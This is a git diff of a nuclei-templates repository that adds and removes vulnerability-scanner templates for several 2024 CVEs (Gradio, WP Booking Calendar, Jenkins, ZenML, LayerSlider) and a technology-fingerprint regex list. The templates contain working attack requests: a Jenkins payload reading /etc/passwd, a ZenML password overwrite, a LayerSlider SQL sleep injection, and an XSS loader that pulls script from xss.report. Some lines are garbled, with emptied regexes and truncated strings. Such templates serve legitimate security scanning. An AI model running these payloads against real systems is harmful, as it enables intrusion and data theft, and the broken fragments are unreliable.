b/nuclei-templates/CVE-2024/CVE-2024-1183.yaml new file mode 100644 index 0000000000..c4e19446e2 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-1183.yaml @@ -0,0 +1,36 @@ +id: CVE-2024-1183 + +info: + name: Gradio - Server Side Request Forgery + author: DhiyaneshDK + severity: medium + description: | + An SSRF (Server-Side Request Forgery) vulnerability exists in the gradio-app/gradio repository, allowing attackers to scan and identify open ports within an internal network. By manipulating the 'file' parameter in a GET request, an attacker can discern the status of internal ports based on the presence of a 'Location' header or a 'File not allowed' error in the response. + reference: + - https://github.com/gradio-app/gradio/commit/2ad3d9e7ec6c8eeea59774265b44f11df7394bb4 + - https://huntr.com/bounties/103434f9-87d2-42ea-9907-194a3c25007c + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-1183 + cwe-id: CWE-601 + epss-score: 0.00061 + epss-percentile: 0.24702 + metadata: + verified: true + max-request: 1 + shodan-query: html:"__gradio_mode__" + tags: cve,cve2024,ssrf,oast,gradio + +http: + - raw: + - | + GET /file=http://oast.pro HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' + part: header +# digest: 4a0a004730450221008fa9c24b03fedb13e37837ad2730bc20d6d973ad45a2d74dd82193fb651172c5022057ad36fe5c2c8f0f555f7106c808470d5cfc40e96a168c822c4cc96f1183df15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-1207.yaml b/nuclei-templates/CVE-2024/CVE-2024-1207.yaml new file mode 100644 index 0000000000..12aedaaf1f --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-1207.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-1207 + +info: + name: > + Booking Calendar <= 9.9 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The WP Booking Calendar plugin for WordPress is vulnerable to SQL Injection via the 'calendar_request_params[dates_ddmmyy_csv]' parameter in all versions up to, and including, 9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7802ed1f-138c-4a3d-916c-80fb4f7699b2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-1207 + metadata: + fofa-query: "wp-content/plugins/booking/" + google-query: inurl:"/wp-content/plugins/booking/" + shodan-query: 'vuln:CVE-2024-1207' + tags: cve,wordpress,wp-plugin,booking,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 9.9') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-23897.yaml b/nuclei-templates/CVE-2024/CVE-2024-23897.yaml deleted file mode 100644 index 62a1aba442..0000000000 --- a/nuclei-templates/CVE-2024/CVE-2024-23897.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2024-23897 - -info: - name: Jenkins < 2.441 - Arbitrary File Read - author: iamnoooob,rootxharsh,pdresearch - severity: high - description: | - Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system. - reference: - - https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314 - - https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/ - - https://github.com/Mr-xn/Penetration_Testing_POC - - https://github.com/forsaken0127/CVE-2024-23897 - - https://github.com/nomi-sec/PoC-in-GitHub - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2024-23897 - epss-score: 0.41536 - epss-percentile: 0.97188 - cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* - metadata: - verified: true - max-request: 1 - vendor: jenkins - product: jenkins - shodan-query: "product:\"Jenkins\"" - tags: cve,cve2024,lfi,rce,jenkins -variables: - payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}" - -javascript: - - code: | - let m = require('nuclei/net'); - let name=(Host.includes(':') ? Host : Host+":80"); - let conn,conn2; - try { conn = m.OpenTLS('tcp', name) } catch { conn= m.Open('tcp', name)} - conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n'); - try { conn2 = m.OpenTLS('tcp', name) } catch { conn2= m.Open('tcp', name)} - conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body) - resp = conn.RecvString(1000) - args: - Body: "{{payload}}" - Host: "{{Hostname}}" - - matchers: - - type: dsl - dsl: - - 'contains(response, "No such agent \"")' - - extractors: - - type: regex - group: 1 - regex: - - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' -# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2024/CVE-2024-25723.yaml b/nuclei-templates/CVE-2024/CVE-2024-25723.yaml new file mode 100644 index 0000000000..7c2bea8be1 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-25723.yaml @@ -0,0 +1,56 @@ +id: CVE-2024-25723 +info: + name: Zenml Improper Access Control + author: VulnSphere + severity: high + description: "ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because the /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on the basis of a valid username along with a new password in the request body. These are also patched versions: 0.44.4, 0.43.1, and 0.42.2." + reference: + - https://github.com/zenml-io/zenml + - https://github.com/zenml-io/zenml/compare/0.42.1...0.42.2 + - https://github.com/zenml-io/zenml/compare/0.43.0...0.43.1 + - https://github.com/zenml-io/zenml/compare/0.44.3...0.44.4 + - https://www.zenml.io/blog/critical-security-update-for-zenml-users + classification: + epss-score: 0.00045 + epss-percentile: 0.13033 + tags: intrusive + + +http: + - raw: + - | + POST /api/v1/login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json + Content-Type: application/x-www-form-urlencoded + Referer: {{Hostname}}/login?route=%2Fworkspaces%2Fdefault%3F + + password&username=default + + - | + PUT /api/v1/users/{{randstr}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: "application/json;charset=utf-8" + Source-Context: "dashboard" + Referer: {{BaseURL}}/settings/organization + Cookie: zenml-server-7205f7d5-08e1-4829-995b-16d56f6695d9={{token}} + + {"password":"a"} + + extractors: + - type: kval + internal: true + kval: + - set_cookie #Note that kval extractor does not accept dash (-) as input and must be substituted with underscore (_). + + + matchers-condition: and + matchers: + - type: word + words: + - '"permission_denied":false' + - '"created"' + - '"updated' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2024/CVE-2024-2879.yaml b/nuclei-templates/CVE-2024/CVE-2024-2879.yaml new file mode 100644 index 0000000000..27dc05462e --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-2879.yaml @@ -0,0 +1,55 @@ +id: CVE-2024-2879 + +info: + name: WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection + author: d4ly + severity: critical + description: | + The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: Fixed in 7.10.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-2879 + - https://www.securityblue.team/blog/posts/Critical-Vulnerability-in-WordPress-Plugin-LayerSlider + - https://www.wordfence.com/blog/2024/04/5500-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-layerslider-wordpress-plugin/ + - https://layerslider.com/release-log/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3fddf96e-029c-4753-ba82-043ca64b78d3?source=cve + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-2879 + cwe-id: CWE-89 + epss-score: 0.00043 + epss-percentile: 0.07687 + metadata: + verified: true + max-request: 2 + publicwww-query: "/wp-content/plugins/LayerSlider/" + tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/LayerSlider/assets/static/public/front.css" + + matchers: + - type: word + internal: true + words: + - ".ls-clearfix:before" + + - raw: + - | + @timeout: 10s + GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1' + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(body, "' + - '">' + - 'javascript:eval("var a=document.createElement(\"script\");a.src=\"//xss.report/s/shelled\";document.body.appendChild(a)")' + - '">' + - '">

Produced by Haddock version ([0-9.]+)

- condition: or - part: body - - - type: regex - name: lightmon-engine - regex: - - - condition: or - part: body - - - type: regex - name: roundcube - regex: - - RoundCube - condition: or - part: body - - - type: regex - name: advanced-web-stats - regex: - - aws\.src = [^<]+caphyon-analytics - condition: or - part: body - - - type: regex - name: riskified - regex: - - <[^>]*beacon\.riskified\.com - - <[^>]*c\.riskified\.com - condition: or - part: body - - - type: regex - name: dnn - regex: - - <!-- by DotNetNuke Corporation - - <!-- DNN Platform - condition: or - part: body - - - type: regex - name: w3-total-cache - regex: - - <!--[^>]+W3 Total Cache - condition: or - part: body - - - type: regex - name: tessitura - regex: - - '<!--[^>]+Tessitura Version: (\d*\.\d*\.\d*)?' - condition: or - part: body - - - type: regex - name: synology-diskstation - regex: - - <noscript><div class='syno-no-script' - condition: or - part: body - - - type: regex - name: whooshkaa - regex: - - <iframe src="[^>]+whooshkaa\.com - condition: or - part: body - - - type: regex - name: cubecart - regex: - - (?:Powered by <a href=[^>]+cubecart\.com|<p[^>]+>Powered by CubeCart) - condition: or - part: body - - - type: regex - name: powergap - regex: - - <a[^>]+title="POWERGAP - - <input type="hidden" name="shopid" - condition: or - part: body - - - type: regex - name: amcharts - regex: - - <svg[^>]*><desc>JavaScript chart by amCharts ([\d.]*) - condition: or - part: body - - - type: regex - name: webflow - regex: - - <html[^>]+data-wf-site - condition: or - part: body - - - type: regex - name: dokuwiki - regex: - - <div[^>]+id="dokuwiki__> - - <a[^>]+href="#dokuwiki__ - condition: or - part: body - - - type: regex - name: jquery-pjax - regex: - - <div[^>]+data-pjax-container - condition: or - part: body - - - type: regex - name: phpdocumentor - regex: - - <!-- Generated by phpDocumentor - condition: or - part: body - - - type: regex - name: owncloud - regex: - - <a href="https://owncloud\.com" target="_blank">ownCloud Inc\.</a><br/>Your Cloud, Your Data, Your Way! - condition: or - part: body - - - type: regex - name: hexo - regex: - - Powered by <a href="https?://hexo\.io/?"[^>]*>Hexo</ - condition: or - part: body - - - type: regex - name: atlassian-bitbucket - regex: - - <li>Atlassian Bitbucket <span title="[a-z0-9]+" id="product-version" data-commitid="[a-z0-9]+" data-system-build-number="[a-z0-9]+"> v([\d.]+)< - condition: or - part: body - - - type: regex - name: phppgadmin - regex: - - (?:<title>phpPgAdmin|phpPgAdmin) - condition: or - part: body - - - type: regex - name: adnegah - regex: - - + - + condition: or + part: body + - type: regex + name: a-frame + regex: + - ]*> + condition: or + part: body + - type: regex + name: dreamweaver + regex: + - + - + - ]+_tcm\d{2,3}-\d{6}\. + condition: or + part: body + - type: regex + name: microsoft-publisher + regex: + - (?:]*xmlns:w="urn:schemas-microsoft-com:office:publisher"|\s*<\/div> + condition: or + part: body + - type: regex + name: rebelmouse + regex: + - + condition: or + part: body + - type: regex + name: cargo + regex: + - ]+Cargo feed + condition: or + part: body + - type: regex + name: sentry + regex: + - ']*>\s*Raven\.config\(''[^'']*'', \{\s+release: ''([0-9\.]+)''' + condition: or + part: body + - type: regex + name: visual-website-optimizer + regex: + - + condition: or + part: body + - type: regex + name: twiki + regex: + - ]*(?:title|alt)="This site is powered by the TWiki collaboration platform + condition: or + part: body + - type: regex + name: javadoc + regex: + - + condition: or + part: body + - type: regex + name: tamago + regex: + - ]*href="http://tamago\.temonalab\.com + condition: or + part: body + - type: regex + name: haddock + regex: + -

Produced by Haddock version ([0-9.]+)

+ condition: or + part: body + - type: regex + name: lightmon-engine + regex: + - + condition: or + part: body + - type: regex + name: roundcube + regex: + - RoundCube + condition: or + part: body + - type: regex + name: advanced-web-stats + regex: + - aws\.src = [^<]+caphyon-analytics + condition: or + part: body + - type: regex + name: riskified + regex: + - <[^>]*beacon\.riskified\.com + - <[^>]*c\.riskified\.com + condition: or + part: body + - type: regex + name: dnn + regex: + - <!-- by DotNetNuke Corporation + - <!-- DNN Platform + condition: or + part: body + - type: regex + name: w3-total-cache + regex: + - <!--[^>]+W3 Total Cache + condition: or + part: body + - type: regex + name: tessitura + regex: + - '<!--[^>]+Tessitura Version: (\d*\.\d*\.\d*)?' + condition: or + part: body + - type: regex + name: synology-diskstation + regex: + - <noscript><div class='syno-no-script' + condition: or + part: body + - type: regex + name: whooshkaa + regex: + - <iframe src="[^>]+whooshkaa\.com + condition: or + part: body + - type: regex + name: cubecart + regex: + - (?:Powered by <a href=[^>]+cubecart\.com|<p[^>]+>Powered by CubeCart) + condition: or + part: body + - type: regex + name: powergap + regex: + - <a[^>]+title="POWERGAP + - <input type="hidden" name="shopid" + condition: or + part: body + - type: regex + name: amcharts + regex: + - <svg[^>]*><desc>JavaScript chart by amCharts ([\d.]*) + condition: or + part: body + - type: regex + name: webflow + regex: + - <html[^>]+data-wf-site + condition: or + part: body + - type: regex + name: dokuwiki + regex: + - <div[^>]+id="dokuwiki__> + - <a[^>]+href="#dokuwiki__ + condition: or + part: body + - type: regex + name: jquery-pjax + regex: + - <div[^>]+data-pjax-container + condition: or + part: body + - type: regex + name: phpdocumentor + regex: + - <!-- Generated by phpDocumentor + condition: or + part: body + - type: regex + name: owncloud + regex: + - <a href="https://owncloud\.com" target="_blank">ownCloud Inc\.</a><br/>Your Cloud, Your Data, Your Way! + condition: or + part: body + - type: regex + name: hexo + regex: + - Powered by <a href="https?://hexo\.io/?"[^>]*>Hexo</ + condition: or + part: body + - type: regex + name: atlassian-bitbucket + regex: + - <li>Atlassian Bitbucket <span title="[a-z0-9]+" id="product-version" data-commitid="[a-z0-9]+" data-system-build-number="[a-z0-9]+"> v([\d.]+)< + condition: or + part: body + - type: regex + name: phppgadmin + regex: + - (?:<title>phpPgAdmin|phpPgAdmin) + condition: or + part: body + - type: regex + name: adnegah + regex: + -